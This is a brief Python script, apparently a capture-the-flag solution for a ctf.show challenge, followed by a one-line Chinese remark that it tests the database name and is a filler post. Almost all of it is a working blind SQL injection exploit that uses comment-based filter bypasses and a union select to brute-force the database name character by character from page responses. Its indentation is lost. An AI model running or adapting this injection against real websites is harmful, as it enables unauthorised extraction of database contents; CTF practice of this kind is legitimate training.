import threading
import requests
url1 = "http://fe9bdd81-5686-4588-a6b2-37f03fda52f3.challenge.ctf.show:8080/index.php?id=1'/**/union/**/select/**/1,"
def dataname(url):
c=''
for j in range(1,5):
for i in range(35,127):
ur=url+"ascii(substr(database(),"+str(j)+",1))="+str(i)+",3/**/#"
req = requests.get(ur)
# print (req.text)
if "<h4>1" in req.text:
c+=chr(i)
print (chr(i))
break
else:
pass
print (c)
t=threading.Thread(target=dataname,args=(url1,))
t.start()
测试数据库库名,后续会放出另外的解题方法,水篇文章